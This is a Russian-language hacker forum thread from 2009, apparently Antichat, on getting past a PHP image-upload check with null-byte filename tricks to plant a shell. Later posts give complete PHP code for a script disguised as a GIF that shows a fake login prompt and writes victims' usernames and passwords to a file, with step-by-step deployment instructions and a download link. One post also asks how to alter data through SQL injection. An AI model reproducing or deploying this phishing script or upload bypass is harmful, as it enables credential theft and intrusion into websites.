16.07.2009, 17:35
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Странно, только что погонял локально с помощью такой формы:
PHP код:
<?php
if (isset($_POST['Upload'])) {
$target_path = "/home/dfgdf/http/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>Your image was not uploaded.</pre>';
} else {
echo '<pre>' . $uploaded_name . ' succesfully uploaded! </pre>';
}
} else {
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>
<form enctype=multipart/form-data method=post><input name=uploaded type=file><input type=submit name=Upload>
Всё загружается как есть, php не прокатит, т.е. в итоге если загрузил 5.php%00.jpg - то локально так файл называться и будет, если загрузил 5.php%2500.jpg - то локально так файло называться и будет, в браузере есс-но не отображается - пишет
Код:
requested URL /5.php was not found on this server
Т.е. при обращению по урл - да, разрешние второе обрезается, в случае сохранения %00.jpg, а вот откуда там берется %2500.jpg - непонятно, возможно не весь код показал
Так что не получиться, разрешение четко отсекает, если не jpg - гуляй Василий
ЗЫЖ Ну по крайней мере это мой мнение
Тестил при всяких маджиках и он и офф - одна фигня. Если только локальный инклуд, он так можно и просто в картинку код запихать
Последний раз редактировалось Pashkela; 16.07.2009 в 17:43..
|
|
|
16.07.2009, 18:08
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Pashkela, ты не прав... теория это конечно хорошо, но практика важнее. Когда ты перехватываешь данные с помощью Tamper Data и вставляешь %00 в имя файла, ты забываешь, что это не GET а POST данные, другими словами когда ты вставил %00 надо еще раскодировать данные (правой кнопкой на названии массива и в полученной менюшке пункт раскодировать)
__________________
Карфаген должен быть разрушен...
|
|
|
|
16.07.2009, 18:51
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 Scipio:
Непонятно что-то, объясни тупому, ну тыкнул на POST_DATA, нажал раскодировать, и что дальше? Можно шелл залить?  Ты имеешь в виду, что делается urldecode? И что это нам может дать? Ну вставил туда %00 или наоборот убрал - проверяется все равно позже в данном конкретном примере. Чото недогоняю
Не, понятно, что принцип как у Шанкара в сплойте для PHPBB примерно, только все равно не понятно. На пальцах бы объяснить |
|
|
|
16.07.2009, 19:18
|
|
Познающий
Регистрация: 03.02.2009
Сообщений: 32
С нами:
9088878
Репутация:
18
|
|
РЕБЯТА ПОМОГИТЕ ПОЖАЛУЙСТА!!!!!!!!!!!!!!!!!!!!!!!!
Покажите примерчик скл уязвы какой нить как в ней правильно изменить переменные
с update или другой..
Спасиба!
|
|
|
|
17.07.2009, 12:39
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами:
9989667
Репутация:
240
|
|
Сообщение от Staratel
РЕБЯТА ПОМОГИТЕ ПОЖАЛУЙСТА!!!!!!!!!!!!!!!!!!!!!!!!
Покажите примерчик скл уязвы какой нить как в ней правильно изменить переменные
с update или другой..
Спасиба!
Код:
http://milw0rm.com/papers/149
прочти, может ето то, что ты искал;-) Ах да, погугли по милворму типа, add new user, insert, update, посмотри примеры в сплоитах.
Последний раз редактировалось The_HuliGun; 17.07.2009 в 12:43..
|
|
|
|
16.07.2009, 22:30
|
|
Новичок
Регистрация: 14.09.2006
Сообщений: 17
С нами:
10344701
Репутация:
0
|
|
Народ а тема c php кодом в .gif файле больше не работает ? чтобы вместе с картинкой авторизация вылетала...
<?
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="http://victim/ - Login"');
}
elseif($login)
{
//ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
|
|
|
|
16.07.2009, 22:42
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Staratel, изменять даных в инъекциях нельзя.
piton, все работает. Надо только правильно настроить.
|
|
|
|
17.07.2009, 11:12
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Сообщение от mailbrush
Staratel, изменять даных в инъекциях нельзя.
Поспорю...
В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)
|
|
|
|
16.07.2009, 22:57
|
|
Новичок
Регистрация: 14.09.2006
Сообщений: 17
С нами:
10344701
Репутация:
0
|
|
настроил и файл .htaccess и тд раньшевсе работало а щас ниодин браузер не понимает.
|
|
|
|
17.07.2009, 09:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Вот, держи: http://bestquest.info/other/image.zip
Инструкция:
1. Заливаешь на хост.
2. Ставишь CHMOD 777 на папку, CHMOD 755 на скрипт.
3. Кидаешь ссылку кому-то на image.gif.
4. Если юзерр ввел пасс > 4 символа, смотришь файл passwords.txt (он создастся при вводе пароля).
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
